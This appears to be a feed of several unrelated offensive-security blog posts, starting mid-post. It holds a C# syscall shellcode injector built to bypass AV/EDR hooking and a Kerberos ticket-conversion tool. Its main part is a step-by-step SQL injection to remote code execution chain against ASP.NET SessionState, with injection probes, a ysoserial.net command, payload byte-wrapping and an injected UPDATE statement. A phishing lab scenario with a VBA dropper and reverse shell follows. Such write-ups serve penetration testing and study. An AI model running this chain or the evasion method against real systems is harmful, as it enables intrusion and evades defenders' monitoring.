To begin, I want to cover why we would want to use syscalls in the first place. The answer is API hooking, performed by AV/EDR products. This is a technique defensive products use to inspect Win32 API calls before they are executed, determine if they are suspicious/malicious, and either block or allow the call to proceed. This is done by slightly changing the assembly of commonly abused API calls to jump to AV/EDR-controlled code, where the call is inspected, and assuming it is allowed, jumping back to the code of the original API call. For example, the CreateThread and CreateRemoteThread Win32 APIs are often used when injecting shellcode into a local or remote process. In fact I will use CreateThread shortly in a demo of injection using strictly Win32 APIs. These APIs are defined in Windows DLL files; in this case, MSDN tells us, in Kernel32.dll. These are user-mode DLLs, which means they are accessible to running user applications, and they do not actually interact directly with the operating system or CPU. Win32 APIs are essentially a layer of abstraction over the Windows native API. The native API is considered kernel-mode, in that these APIs are closer to the operating system and underlying hardware. There are technically lower levels than this that actually perform kernel-mode functionality, but these are not exposed directly. The native API is the lowest level that is still exposed and accessible by user applications, and it functions as a kind of bridge or glue layer between user code and the operating system. Here’s a good diagram of how it looks:

Windows Architecture

You can see how Kernel32.dll, despite the misleading name, sits at a higher level than ntdll.dll, which is right at the boundary between user-mode and kernel-mode.

So why does the Win32 API exist? A big reason it exists is to call native APIs. When you call a Win32 API, it in turn calls a native API function, which then crosses the boundary into kernel-mode. User-mode code never directly touches hardware or the operating system. So the way it is able to access lower-level functionality is through native APIs. But if the native APIs still have to call yet lower level APIs, why not go straight to native APIs and cut out an extra step? One answer is so that Microsoft can make changes to the native APIs without affecting user-mode application code. In fact, the specific functions in the native API often do change between Windows versions, yet the changes don’t affect user-mode code because the Win32 APIs remain the same.

So why do all these layers and levels and APIs matter to us if we just want to inject some shellcode? The main difference for our purposes between Win32 APIs and native APIs is that AV/EDR products can hook Win32 calls, but not native ones. This is because native calls are considered kernel-mode, and user code can’t make changes to it. There are some exceptions to this, like drivers, but they aren’t applicable for this post. The big takeaway is defenders can’t hook native API calls, while we are still allowed to call them ourselves. This way we can achieve the same functionality without the same visibility by defensive products. This is the fundamental value of system calls.

System Calls

Another name for native API calls is system calls. Similar to Linux, each system call has a specific number that represents it. This number represents an entry in the System Service Dispatch Table (SSDT), which is a table in the kernel that holds various references to various kernel-level functions. Each named native API has a matching syscall number, which has a corresponding SSDT entry. In order to make use of a syscall, it’s not enough to know the name of the API, such as NtCreateThread. We have to know its syscall number as well. We also need to know which version of Windows our code will run on, as the syscall numbers can and likely will change between versions. There are two ways to find these numbers, one easy, and one involving the dreaded debugger.

The first and easiest way is to use the handy Windows system call table created by Mateusz “j00ru” Jurczyk. This makes it dead simple to find the syscall number you’re looking for, assuming you already know which API you’re looking for (more on that later).

WinDbg

The second method of finding syscall numbers is to look them up directly at the source: ntdll.dll. The first syscall we need for our injector is NtAllocateVirtualMemory. So we can fire up WinDbg and look for the NtAllocateVirtualMemory function in ntdll.dll. This is much easier than it sounds. First I open a target process to debug. It doesn’t matter which process, as basically all processes will map ntdll.dll. In this case I used good old notepad.

Opening Notepad in WinDbg

We attach to the notepad process and in the command prompt enter x ntdll!NtAllocateVirtualMemory. This lets us examine the NtAllocateVirtualMemory function within the ntdll.dll DLL. It returns a memory location for the function, which we examine, or unassemble, with the u command:

NtAllocateVirtualMemory Unassembled

Now we can see the exact assembly language instructions for calling NtAllocateVirtualMemory. Calling syscalls in assembly tends to follow a pattern, in that some arguments are set up on the stack, seen with the mov r10,rcx statement, followed by moving the syscall number into the eax register, shown here as mov eax,18h. eax is the register the syscall instruction uses for every syscall. So now we know the syscall number of NtAllocateVirtualMemory is 18 in hex, which happens to be the same value listed in Mateusz’s table! So far so good. We repeat this two more times, once for NtCreateThreadEx and once for NtWaitForSingleObject.
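As an aside, the stub pattern above is regular enough that the syscall number can be extracted programmatically rather than read off by eye. Here is a hedged illustration in Python (not part of the C# project; `extract_syscall_number` is a name of my own): check for the mov r10,rcx / mov eax,imm32 prologue and pull out the immediate:

```python
import struct

def extract_syscall_number(stub: bytes):
    """Return the syscall number from a clean x64 Nt* stub, or None if the
    prologue doesn't match (e.g. it starts with a hook's jmp instead)."""
    # 4c 8b d1 = mov r10,rcx ; b8 xx xx xx xx = mov eax,imm32
    if len(stub) >= 8 and stub[:4] == b"\x4c\x8b\xd1\xb8":
        return struct.unpack_from("<I", stub, 4)[0]
    return None

# First 8 bytes of NtAllocateVirtualMemory as seen in WinDbg above
print(hex(extract_syscall_number(bytes.fromhex("4c8bd1b818000000"))))  # prints 0x18
```

A hooked function fails the prologue check and returns None, which is itself a crude hook detector.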

Finding the syscall number for NtCreateThreadEx Finding the syscall number for NtWaitForSingleObject

Where are you getting these native functions?

So far the process of finding the syscall numbers for our native API calls has been pretty easy. But there’s a key piece of information I’ve left out thus far: how do I know which syscalls I need? The way I did this was to take a basic functioning shellcode injector in C# that uses Win32 API calls (named Win32Injector, included in the Github repository for this post) and found the corresponding syscalls for each Win32 API call. Here is the code for Win32Injector:

Win32Injector

This is a barebones shellcode injector that executes some shellcode to display a popup box:

Hello world from Win32Injector

As you can see from the code, the three main Win32 API calls used via P/Invoke are VirtualAlloc, CreateThread, and WaitForSingleObject, which allocate memory for our shellcode, create a thread that points to our shellcode, and wait on that thread, respectively. As these are normal Win32 APIs, they each have comprehensive documentation on MSDN. But as native APIs are considered undocumented, we may have to look elsewhere. There is no one source of truth for API documentation that I could find, but with some searching I was able to find everything I needed.

In the case of VirtualAlloc, some simple searching showed that the underlying native API was NtAllocateVirtualMemory, which was in fact documented on MSDN. One down, two to go.

Unfortunately, there was no MSDN documentation for NtCreateThreadEx, which is the native API for CreateThread. Luckily, badBounty’s directInjectorPOC has the function definition available, and already in C# as well. This project was a huge help, so kudos to badBounty!

Lastly, I needed to find documentation for NtWaitForSingleObject, which as you might guess, is the native API called by WaitForSingleObject. You’ll notice a theme where many native API calls are prefaced with “Nt”, which makes mapping them from Win32 calls easier. You may also see the prefix “Zw”, which is also a native API call, but normally called from the kernel. These are sometimes identical, which you will see if you do x ntdll!ZwWaitForSingleObject and x ntdll!NtWaitForSingleObject in WinDbg. Again we get lucky with this API, as ZwWaitForSingleObject is documented on MSDN.

I want to point out a few other good sources of information for mapping Win32 to native API calls. First is the source code for ReactOS, which is an open source reimplementation of Windows. The Github mirror of their codebase has lots of syscalls you can search for. Next is SysWhispers, by jthuraisamy. It’s a project designed to help you find and implement syscalls. Really good stuff here. Lastly, the tool API Monitor. You can run a process and watch what APIs are called, their arguments, and a whole lot more. I didn’t use this a ton, as I only needed 3 syscalls and it was faster to find existing documentation, but I can see how useful this tool would be in larger projects. I believe ProcMon from Sysinternals has similar functionality, but I didn’t test it out much.

Ok, so we have our Win32 APIs mapped to our syscalls. Let’s write some C#!

But these docs are all for C/C++! And isn’t that assembly over there…

Wait a minute, these docs all have C/C++ implementations. How do we translate them into C#? The answer is marshaling. This is the essence of what P/Invoke does. Marshaling is a way of making use of unmanaged code, e.g. C/C++, and using it in a managed context, that is, in C#. This is easily done for Win32 APIs via P/Invoke. Just import the DLL, specify the function definition with the help of pinvoke.net, and you’re off to the races. You can see this in the demo code of Win32Injector. But since syscalls are undocumented, Microsoft does not provide such an easy way to interface with them. But it is indeed possible, through the magic of delegates. Jack Halon covers delegates really well here and here, so I won’t go too in depth in this post. I would suggest reading those posts to get a good handle on them, and the process of using syscalls in general. But for completeness, delegates are essentially function pointers, which allow us to pass functions as parameters to other functions. The way we use them here is to define a delegate whose return type and function signature matches that of the syscall we want to use. We use marshaling to make sure the C/C++ data types are compatible with C#, define a function that implements the syscall, including all of its parameters and return type, and there you have it!

Not quite. We can’t actually call a native API, since the only implementation of it we have is in assembly! We know its function definition and parameters, but we can’t actually call it directly the same way we do a Win32 API. The assembly will work just fine for us though. Once again, it’s rather simple to execute assembly in C/C++, but C# is a little harder. Luckily we have a way to do it, and we already have the assembly from our WinDbg adventures. And don’t worry, you don’t really need to know assembly to make use of syscalls. Here is the assembly for the NtAllocateVirtualMemory syscall:

NtAllocateVirtualMemory Assembly

As you can see from the comments, we’re setting up some arguments on the stack, moving our syscall number into the eax register, and using the magic syscall operator. At a low enough level, this is just a function call. And remember how delegates are just function pointers? Hopefully it’s starting to make sense how this is fitting together. We need to get a function pointer that points to this assembly, along with some arguments in a C/C++ compatible format, in order to call a native API.
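If delegates-as-function-pointers feels abstract, Python’s ctypes offers a close analogue (an illustrative sketch for Linux/macOS, unrelated to the C# project itself): take a raw function address and wrap it in a typed callable, much like Marshal.GetDelegateForFunctionPointer does:

```python
import ctypes

# Load the C library of the current process and get the raw address of abs()
libc = ctypes.CDLL(None)  # Linux/macOS; on Windows you'd load a DLL by name
addr = ctypes.cast(libc.abs, ctypes.c_void_p).value

# The "delegate": a type describing the signature behind the pointer
AbsFunc = ctypes.CFUNCTYPE(ctypes.c_int, ctypes.c_int)

# Turn the bare address back into a typed, callable function
fn = AbsFunc(addr)
print(fn(-7))  # prints 7
```

The C# version does the same thing, except the address points at our syscall assembly rather than a library export.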

Putting it all together

So we’re almost done now. We have our syscalls, their numbers, the assembly to call them, and a way to call them in delegates. Let’s see how it actually looks in C#:

NtAllocateVirtualMemory Code

Starting from the top, we can see the C/C++ definition of NtAllocateVirtualMemory, as well as the assembly for the syscall itself. Starting at line 38, we have the C# definition of NtAllocateVirtualMemory. Note that it can take some trial and error to get each type in C# to match up with the unmanaged type. We create a pointer to our assembly inside an unsafe block. This allows us to perform operations in C#, like operate on raw memory, that are normally not safe in managed code. We also use the fixed keyword to make sure the C# garbage collector does not inadvertently move our memory around and change our pointers. Once we have a raw pointer to the memory location of our shellcode, we need to change its memory protection to executable so it can be run directly, as it will be a function pointer and not just data. Note that I am using the Win32 API VirtualProtectEx to change the memory protection. I’m not aware of a way to do this via syscall, as it’s kind of a chicken and the egg problem of getting the memory executable in order to run a syscall. If anyone knows how to do this in C#, please reach out! Another thing to note here is that setting memory to RWX is generally somewhat suspicious, but as this is a POC, I’m not too worried about that at this point. We’re concerned with hooking right now, not memory scanning!

Now comes the magic. This is the struct where our delegates are declared:

Delegates Struct

Note that a delegate definition is just a function signature and return type. The implementation is up to us, as long as it matches the delegate definition, and it’s what we’re implementing here in the C# NtAllocateVirtualMemory function. At line 65 above, we create a delegate named assembledFunction, which takes advantage of the special marshaling function Marshal.GetDelegateForFunctionPointer. This method allows us to get a delegate from a function pointer. In this case, our function pointer is the pointer to the syscall assembly called memoryAddress. assembledFunction is now a function pointer to an assembly language function, which means we can now execute our syscall! We can call the assembledFunction delegate like any normal function, complete with arguments, and we will get the results of the NtAllocateVirtualMemory syscall. So in our return statement we call assembledFunction with the arguments that were passed in and return the result. Let’s look at where we actually call this function in Program.cs:

Calling NtAllocateMemory

Here you can see we make a call to NtAllocateMemory instead of the Win32 API VirtualAlloc that Win32Injector uses. We set up the function call with all the needed arguments (lines 43-48) and make the call to NtAllocateMemory. This returns a block of memory for our shellcode, just like VirtualAlloc would!

The remaining steps are similar:

Remaining Syscalls

We copy our shellcode into our newly-allocated memory, and then create a thread within our current process pointing to that memory via another syscall, NtCreateThreadEx, in place of CreateThread. Finally, we wait on the thread with a call to the syscall NtWaitForSingleObject, instead of WaitForSingleObject. Here’s the final result:

Hello World Shellcode

Hello world via syscall! Assuming this was some sort of payload running on a system with API hooking enabled, we would have bypassed it and successfully run our payload.

A note on native code

Some key parts of this puzzle I’ve not mentioned yet are all of the native structs, enumerations, and definitions needed for the syscalls to function properly. If you look at the screenshots above, you will see types that don’t have implementations in C#, like the NTSTATUS return type for all the syscalls, or the AllocationType and ACCESS_MASK bitmasks. These types are normally declared in various Windows headers and DLLs, but to use syscalls we need to implement them ourselves. The process I followed to find them was to look for any non-simple type and try to find a definition for it. Pinvoke.net was massively helpful for this task. Between it and other resources like MSDN and the ReactOS source code, I was able to find and add everything I needed. You can find that code in the Native.cs class of the solution here.

Wrapup

Syscalls are fun! It’s not every day you get to combine 3 different languages, managed and unmanaged code, and several levels of Windows APIs in one small program. That said, there are some clear difficulties with syscalls. They require a fair bit of boilerplate code to use, and that boilerplate is scattered all around for you to find like a little undocumented treasure hunt. Debugging can also be tricky with the transition between managed and unmanaged code. Finally, syscall numbers change frequently and have to be customized for the platform you’re targeting. D/Invoke seems to handle several of these issues rather elegantly, so I’m excited to dig into those more soon.

Rubeus to Ccache

17 May 2020 at 15:20

I wrote a new little tool called RubeusToCcache recently to handle a use case I come across often: converting the Rubeus output of Base64-encoded Kerberos tickets into .ccache files for use with Impacket.

Background

If you’ve done any network penetration testing, red teaming, or Hack The Box/CTFs, you’ve probably come across Rubeus. It’s a fantastic tool for all things Kerberos, especially when it comes to tickets and Pass The Ticket/Overpass The Hash attacks. One of the most commonly used features of Rubeus is the ability to request/dump TGTs and use them in different contexts in Rubeus or with other tools. Normally Rubeus outputs the tickets in Base64-encoded .kirbi format, .kirbi being the file type commonly used by Mimikatz. The Base64 encoding makes it very easy to copy and paste and generally make use of the TGT in different ways.

You can also use acquired tickets with another excellent toolset, Impacket. Many of the Impacket tools can use Kerberos authentication via a TGT, which is incredibly useful in a lot of different contexts, such as pivoting through a compromised host so you can Stay Off the Land. Only one problem: Impacket tools use the .ccache file format to represent Kerberos tickets. Not to worry though, because Zer1t0 wrote ticket_converter.py (included with Impacket), which allows you to convert .kirbi files directly into .ccache files. Problem solved, right?

Rubeus To Ccache

Mostly solved, because there’s still the fact that Rubeus spits out .kirbi files Base64 encoded. Is it hard or time-consuming to do a simple little [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($base64RubeusTGT)) to get a .kirbi and then use ticket_converter.py? Not at all, but it’s still an extra step that gets repeated over and over, making it ripe for a little automation. Hence Rubeus to Ccache.
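The decode step the tool automates boils down to something like this (a Python sketch; `rubeus_b64_to_kirbi` and the file name are placeholders of my own, not the tool’s actual code):

```python
import base64

def rubeus_b64_to_kirbi(b64_blob: str, out_path: str) -> bytes:
    """Decode the Base64 ticket blob Rubeus prints and write it out as raw
    .kirbi bytes (written as bytes, not decoded into a text string)."""
    raw = base64.b64decode(b64_blob)
    with open(out_path, "wb") as f:
        f.write(raw)
    return raw

# The resulting ticket.kirbi can then be fed to ticket_converter.py:
# rubeus_b64_to_kirbi(blob_from_rubeus, "ticket.kirbi")
```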

You pass it the Base64-encoded blob Rubeus gives you, along with a file name for a .kirbi file and a .ccache file, and you get a fresh ticket in both formats, ready for Impacket. To use the .ccache file, make sure to set the appropriate environment variable: export KRB5CCNAME=shiny_new_ticket.ccache. Then you can use most Impacket tools like this: wmiexec.py domain/user@target -k -no-pass, where the -k flag indicates the use of Kerberos tickets for authentication.

Usage

╦═╗┬ ┬┌┐ ┌─┐┬ ┬┌─┐  ┌┬┐┌─┐  ╔═╗┌─┐┌─┐┌─┐┬ ┬┌─┐
╠╦╝│ │├┴┐├┤ │ │└─┐   │ │ │  ║  │  ├─┤│  ├─┤├┤
╩╚═└─┘└─┘└─┘└─┘└─┘   ┴ └─┘  ╚═╝└─┘┴ ┴└─┘┴ ┴└─┘
              By Solomon Sklash
          github.com/SolomonSklash
   Inspired by Zer1t0's ticket_converter.py

usage: rubeustoccache.py [-h] base64_input kirbi ccache

positional arguments:
  base64_input  The Base64-encoded .kirbi, sucha as from Rubeus.
  kirbi         The name of the output file for the decoded .kirbi file.
  ccache        The name of the output file for the ccache file.

optional arguments:
  -h, --help    show this help message and exit

Thanks

Thanks to Zer1t0 and the Impacket project for doing most of the heavy lifting.

From SQL to RCE: Exploiting SessionState Deserialization to Attack ASP.NET Web Applications

20 April 2020 at 16:00

Today I'd like to share an interesting finding from a penetration test last year. It was an ordinary, sunny afternoon of tedious testing as usual, trying every possible injection against every parameter without any progress or breakthrough, until I injected ?id=1; waitfor delay '00:00:05'-- into one page and it hung, with the server responding after exactly 5 seconds. That meant we had found a SQL Injection against SQL Server!

In some aging, sprawling systems, for various complicated reasons, the application often still logs into SQL Server with the sa account. With such a high-privilege database account, we could easily use xp_cmdshell to run system commands and take control of the database server's operating system. But if the story had gone that smoothly, this article wouldn't exist, so naturally the database account we obtained didn't have sufficient privileges. Still, since the SQL Injection we found was stacked-based, we could perform CRUD operations on tables, and with some luck, controlling certain site configuration variables can even lead directly to RCE. So we dumped the schema to understand the architecture, and during the dump we discovered an interesting database:

Database: ASPState
[2 tables]
+---------------------------------------+
| dbo.ASPStateTempApplications          |
| dbo.ASPStateTempSessions              |
+---------------------------------------+

After reading the documentation, I learned that this database exists to store sessions for ASP.NET web applications. By default, sessions are stored in the ASP.NET application's memory, but in certain distributed architectures (e.g. behind a load balancer), multiple identical ASP.NET applications run on different servers and a user's requests are not always routed to the same host, so a mechanism for sharing sessions across hosts is needed. Storing them in SQL Server is one such solution, and it can be enabled by adding the following to web.config:

<configuration>
    <system.web>
        <!-- Store sessions in SQL Server. -->
        <sessionState
            mode="SQLServer"
            sqlConnectionString="data source=127.0.0.1;user id=<username>;password=<password>"
            timeout="20"
        />
        
        <!-- Default: store sessions in memory (in-process). -->
        <!-- <sessionState mode="InProc" timeout="20" /> -->
 
        <!-- Store sessions in the ASP.NET State Service,
             another cross-host session-sharing solution. -->
        <!--
        <sessionState
            mode="StateServer"
            stateConnectionString="tcpip=localhost:42424"
            timeout="20"
        />
        -->
    </system.web>
</configuration>

To create the ASPState database, the built-in tool C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regsql.exe does the job with the following commands:

# Create the ASPState database
aspnet_regsql.exe -S 127.0.0.1 -U sa -P password -ssadd -sstype p

# Remove the ASPState database
aspnet_regsql.exe -S 127.0.0.1 -U sa -P password -ssremove -sstype p

Now that we know how to configure where sessions are stored, and we also control the ASPState database, what can we do? That's the point of the title: achieve Remote Code Execution!

ASP.NET lets us store objects in the session, for example a List: Session["secret"] = new List<String>() { "secret string" };. To persist these objects to SQL Server, it naturally uses a serialization mechanism, and since we control the database, we can also trigger arbitrary deserialization. To do that, we first need to understand how Session objects are serialized and deserialized.

After a quick read of the source code, the classes handling this process are easy to locate. To keep the explanation short, I'll jump straight to what kind of deserialization happens after the data is fetched from the database. The core is the SqlSessionStateStore.GetItem method, which restores the Session object. I've removed as much irrelevant code as possible, but it's still lengthy; if you'd rather not read code, feel free to scroll past it XD

namespace System.Web.SessionState {
    internal class SqlSessionStateStore : SessionStateStoreProviderBase {
        public override SessionStateStoreData  GetItem(HttpContext context,
                                                        String id,
                                                        out bool locked,
                                                        out TimeSpan lockAge,
                                                        out object lockId,
                                                        out SessionStateActions actionFlags) {
            SessionIDManager.CheckIdLength(id, true /* throwOnFail */);
            return DoGet(context, id, false, out locked, out lockAge, out lockId, out actionFlags);
        }

        SessionStateStoreData DoGet(HttpContext context, String id, bool getExclusive,
                                        out bool locked,
                                        out TimeSpan lockAge,
                                        out object lockId,
                                        out SessionStateActions actionFlags) {
            SqlDataReader       reader;
            byte []             buf;
            MemoryStream        stream = null;
            SessionStateStoreData    item;
            SqlStateConnection  conn = null;
            SqlCommand          cmd = null;
            bool                usePooling = true;

            buf = null;
            reader = null;
            conn = GetConnection(id, ref usePooling);

            try {
                if (getExclusive) {
                    cmd = conn.TempGetExclusive;
                } else {
                    cmd = conn.TempGet;
                }

                cmd.Parameters[0].Value = id + _partitionInfo.AppSuffix; // @id
                cmd.Parameters[1].Value = Convert.DBNull;   // @itemShort
                cmd.Parameters[2].Value = Convert.DBNull;   // @locked
                cmd.Parameters[3].Value = Convert.DBNull;   // @lockDate or @lockAge
                cmd.Parameters[4].Value = Convert.DBNull;   // @lockCookie
                cmd.Parameters[5].Value = Convert.DBNull;   // @actionFlags

                using(reader = SqlExecuteReaderWithRetry(cmd, CommandBehavior.Default)) {
                    if (reader != null) {
                        try {
                            if (reader.Read()) {
                                buf = (byte[]) reader[0];
                            }
                        } catch(Exception e) {
                            ThrowSqlConnectionException(cmd.Connection, e);
                        }
                    }
                }

                if (buf == null) {
                    /* Get short item */
                    buf = (byte[]) cmd.Parameters[1].Value;
                }

                using(stream = new MemoryStream(buf)) {
                    item = SessionStateUtility.DeserializeStoreData(context, stream, s_configCompressionEnabled);
                    _rqOrigStreamLen = (int) stream.Position;
                }
                return item;
            } finally {
                DisposeOrReuseConnection(ref conn, usePooling);
            }
        }
        
        class SqlStateConnection : IDisposable {
            internal SqlCommand TempGet {
                get {
                    if (_cmdTempGet == null) {
                        _cmdTempGet = new SqlCommand("dbo.TempGetStateItem3", _sqlConnection);
                        _cmdTempGet.CommandType = CommandType.StoredProcedure;
                        _cmdTempGet.CommandTimeout = s_commandTimeout;
                        // ignore process of setting parameters
                    }
                    return _cmdTempGet;
                }
            }
        }
    }
}

From the code we can clearly see that it calls the ASPState.dbo.TempGetStateItem3 stored procedure to fetch the session's serialized binary data into the buf variable, then passes buf to SessionStateUtility.DeserializeStoreData to deserialize and restore the Session object. The TempGetStateItem3 stored procedure is roughly equivalent to executing SELECT SessionItemShort FROM [ASPState].dbo.ASPStateTempSessions, so we know the session is stored in the SessionItemShort column of the ASPStateTempSessions table. Next, let's look at what the key DeserializeStoreData does. Again, it's a bit long; scroll past as needed XD

namespace System.Web.SessionState {
    public static class SessionStateUtility {

        [SecurityPermission(SecurityAction.Assert, SerializationFormatter = true)]
        internal static SessionStateStoreData Deserialize(HttpContext context, Stream stream) {
            int                 timeout;
            SessionStateItemCollection   sessionItems;
            bool                hasItems;
            bool                hasStaticObjects;
            HttpStaticObjectsCollection staticObjects;
            Byte                eof;

            try {
                BinaryReader reader = new BinaryReader(stream);
                timeout = reader.ReadInt32();
                hasItems = reader.ReadBoolean();
                hasStaticObjects = reader.ReadBoolean();

                if (hasItems) {
                    sessionItems = SessionStateItemCollection.Deserialize(reader);
                } else {
                    sessionItems = new SessionStateItemCollection();
                }

                if (hasStaticObjects) {
                    staticObjects = HttpStaticObjectsCollection.Deserialize(reader);
                } else {
                    staticObjects = SessionStateUtility.GetSessionStaticObjects(context);
                }

                eof = reader.ReadByte();
                if (eof != 0xff) {
                    throw new HttpException(SR.GetString(SR.Invalid_session_state));
                }
            } catch (EndOfStreamException) {
                throw new HttpException(SR.GetString(SR.Invalid_session_state));
            }
            return new SessionStateStoreData(sessionItems, staticObjects, timeout);
        }
    
        static internal SessionStateStoreData DeserializeStoreData(HttpContext context, Stream stream, bool compressionEnabled) {
            return SessionStateUtility.Deserialize(context, stream);
        }
    }
}

We can see that DeserializeStoreData in turn hands the deserialization off to other classes; depending on the data fetched, it may delegate to SessionStateItemCollection.Deserialize or HttpStaticObjectsCollection.Deserialize. After examining the code, the handling in HttpStaticObjectsCollection looked comparatively simple, so I chose to follow that branch.

namespace System.Web {
    public sealed class HttpStaticObjectsCollection : ICollection {
        static public HttpStaticObjectsCollection Deserialize(BinaryReader reader) {
            int     count;
            string  name;
            string  typename;
            bool    hasInstance;
            Object  instance;
            HttpStaticObjectsEntry  entry;
            HttpStaticObjectsCollection col;

            col = new HttpStaticObjectsCollection();

            count = reader.ReadInt32();
            while (count-- > 0) {
                name = reader.ReadString();
                hasInstance = reader.ReadBoolean();
                if (hasInstance) {
                    instance = AltSerialization.ReadValueFromStream(reader);
                    entry = new HttpStaticObjectsEntry(name, instance, 0);
                }
                else {
                    // skipped
                }
                col._objects.Add(name, entry);
            }

            return col;
        }
    }
}

Following along, we find that HttpStaticObjectsCollection reads a few bytes and then hands the process off to AltSerialization.ReadValueFromStream. At this point you might be thinking, "Don't tell me we have to dig into that too…" — but this is actually far enough, because AltSerialization is essentially a wrapper around BinaryFormatter, and we already have enough information to exploit it. There's also a bonus piece of good news: when I got this far and searched for the class, I found that ysoserial.net already ships a plugin for building AltSerialization deserialization payloads, so we can pull out that tool directly! The one-liner below produces a base64-encoded payload that runs the system command calc.exe.

ysoserial.exe -p Altserialization -M HttpStaticObjectsCollection -o base64 -c "calc.exe"

There's still one small problem to solve. The payload built by ysoserial.net's AltSerialization plugin targets the deserialization of the SessionStateItemCollection or HttpStaticObjectsCollection classes, but the serialized session data stored in the database is wrapped in one additional layer by the SessionStateUtility class, so we need to dress it up a little. Looking back at the code, SessionStateUtility only adds a few bytes; simplified, it looks like this:

timeout = reader.ReadInt32();
hasItems = reader.ReadBoolean();
hasStaticObjects = reader.ReadBoolean();

if (hasStaticObjects)
    staticObjects = HttpStaticObjectsCollection.Deserialize(reader);

eof = reader.ReadByte();

An Int32 takes 4 bytes and a Boolean takes 1 byte, and to make execution enter the HttpStaticObjectsCollection branch, the 6th byte must be 1. First convert the payload produced by ysoserial.net from base64 to hex, then prepend 6 bytes and append 1 byte, as illustrated below:

  timeout    false  true            HttpStaticObjectsCollection             eof
┌─────────┐  ┌┐     ┌┐    ┌───────────────────────────────────────────────┐ ┌┐
00 00 00 00  00     01    010000000001140001000000fff ... snip ... 0000000a0b ff

With this decoration, the payload is ready to attack the SessionStateUtility class!
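The byte layout above is easy to script. Here is a minimal Python sketch (the function and variable names are mine, and the stand-in blob below replaces real ysoserial.net output) that wraps the base64 payload and hex-encodes it for the SQL UPDATE:

```python
import base64

def wrap_for_sessionstate(ysoserial_b64: str) -> str:
    """Prepend timeout (Int32) plus hasItems/hasStaticObjects (one Boolean byte each),
    append the 0xff end-of-stream marker, and hex-encode the result for SQL."""
    inner = base64.b64decode(ysoserial_b64)
    prefix = (0).to_bytes(4, "little")  # timeout = 0
    prefix += b"\x00"                   # hasItems = false
    prefix += b"\x01"                   # hasStaticObjects = true (take this branch)
    return (prefix + inner + b"\xff").hex()

# Dummy stand-in for real ysoserial.net output
payload_hex = wrap_for_sessionstate(base64.b64encode(b"\x01\x00\x00\x00").decode())
```

The resulting hex string can be dropped straight into the 0x{Hex_Encoded_Payload} slot of the UPDATE statement shown below.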

The final step is to use the SQL Injection from the beginning to inject the malicious serialized data into the database. If an ASP.NET_SessionId cookie appears while browsing the target site normally, a corresponding session record already exists in the database, so we only need to execute a SQL UPDATE statement like this:

?id=1; UPDATE ASPState.dbo.ASPStateTempSessions
       SET SessionItemShort = 0x{Hex_Encoded_Payload}
       WHERE SessionId LIKE '{ASP.NET_SessionId}%25'; --

Replace {ASP.NET_SessionId} with your own ASP.NET_SessionId cookie value and {Hex_Encoded_Payload} with the serialized payload prepared above.

What if there is no ASP.NET_SessionId? That means the target probably hasn't stored anything in the session yet, so no record has been created in the database. In that case, we just force a cookie onto it! An ASP.NET SessionId is 24 randomly generated characters drawn from a custom character set. You can generate one with the Python script below, e.g. plxtfpabykouhu3grwv1j1qw, then browse any aspx page with Cookie: ASP.NET_SessionId=plxtfpabykouhu3grwv1j1qw; in theory, ASP.NET will automatically add a record to the database.

import random
# ASP.NET session IDs are 24 characters drawn from this custom 32-character set
chars = 'abcdefghijklmnopqrstuvwxyz012345'
print(''.join(random.choice(chars) for i in range(24)))

If no record appears in the database even then, you'll have to handcraft an INSERT statement to create one. As for how to build it, reading the code should make it easy to construct, so I'll leave that for you to play with :P

Once the payload has been injected, browsing any aspx page again with the cookie ASP.NET_SessionId=plxtfpabykouhu3grwv1j1qw triggers the deserialization and executes arbitrary system commands!

As an aside, exploiting SessionState deserialization to take control of an ASP.NET application host is not limited to the SQL Injection scenario. In internal penetration tests, a common situation is that various information leaks (e.g. an internal GitLab, arbitrary file reads) yield many SQL Server credentials, but never the credentials of the Windows host running the target ASP.NET application. To reach the objective (control of the designated web host), we have used exactly this technique, so it is also somewhat valuable, and very interesting, as a lateral-movement method inside internal networks. What other tricks and variations are possible is up to your continued imagination!

Free Cyber Materials BC Of Covid

11 April 2020 at 11:20

Hello Community,

Really terrible times we’re living in right now. It doesn’t help to literally be right in the “thick of it”. My family and I are unaffected at the moment. Praying for humanity at this point.

Anyways – there have been a bunch of free goodies going around, and it wouldn’t be proper if I didn’t attempt to put some of them in a central place for others 👊🏼💯 Hats off to these organizations, since none of this was required at all.

Leave a comment if you’ve found something I haven’t mentioned for others who visit after you. Stay Safe 📿🙏🏼

 

Note: I get no credit for any of this! I’m simply compiling the materials in one place for you

The post Free Cyber Materials BC Of Covid appeared first on Certification Chronicles.

Pharm Raised Phish 😅🤠

31 March 2020 at 15:55

Life after CISSP:

I had so much housekeeping that I couldn’t attend to while studying (physically and digitally). My office was a complete mess. I lost access to my switch after a power outage because, sadly, I hadn’t copied running-config to startup-config. Basically everything besides wireless hangs off that switch: my ESXi lab, my NAS, all my Raspberry Pis, and everything else. It’s tough to go from risk management to configuring ACLs and VLANs 🤣 It took me about a week to update (and save) the switch configuration, clean up my NAS, clean up all my machines and VMs, and destroy and rebuild my ESXi lab. Just like before, my ESXi lab simulates a corporate network: an Active Directory environment with an assortment of machines running various services. I use pfSense as a virtual firewall/router, which lets you simulate someone attacking over the WAN with your LAN protected by a security device, just like normal. You can google security courses and CTFs to get an idea of typical lab environments. This is helpful because after you spend days importing/uploading/provisioning 5 VMs – now what? You still don’t have any services or applications running. This groundwork is fruitful; we all have to spend the time to stand things up before we can even begin to think about playing around.


Keeping Busy:

I began to think about what I wanted to learn more about. I found an advanced penetration testing book focusing on adversary emulation and APTs that I fell in love with. It’s ironic, because the only reason this book stood out was that it was only 230 pages. I thought, damn, either this thing is complete garbage that captures .01% of something irrelevant some other guy loved, or it’s chock full of gems. It was the latter! My head’s spinning as we write our own VBA dropper that writes a VBS file to disk, which downloads the payload and executes a reverse shell. By the end of chapter one we’re writing our own C2 infrastructure implementing libssh. There’s just something about seeing that hardcore C with the Windows API calls that brings fear and so much curiosity! The payloads and infrastructure progressively improve as the book goes on. Here’s the book

I bet you can see where this is going. To reinforce concepts I replicated the payloads and attack from the book in my lab environment.
Here’s the scenario:

  1. Somehow through password reuse you’ve gained access (attacker) to an organizations webmail login
  2. As a budding hacker you understand situational awareness. Your target is an IT Administrator – who is probably already a little concerned about his job security, since through
    reconnaissance you’ve learned that 30% of the entire IT staff has already been furloughed since the pandemic began.
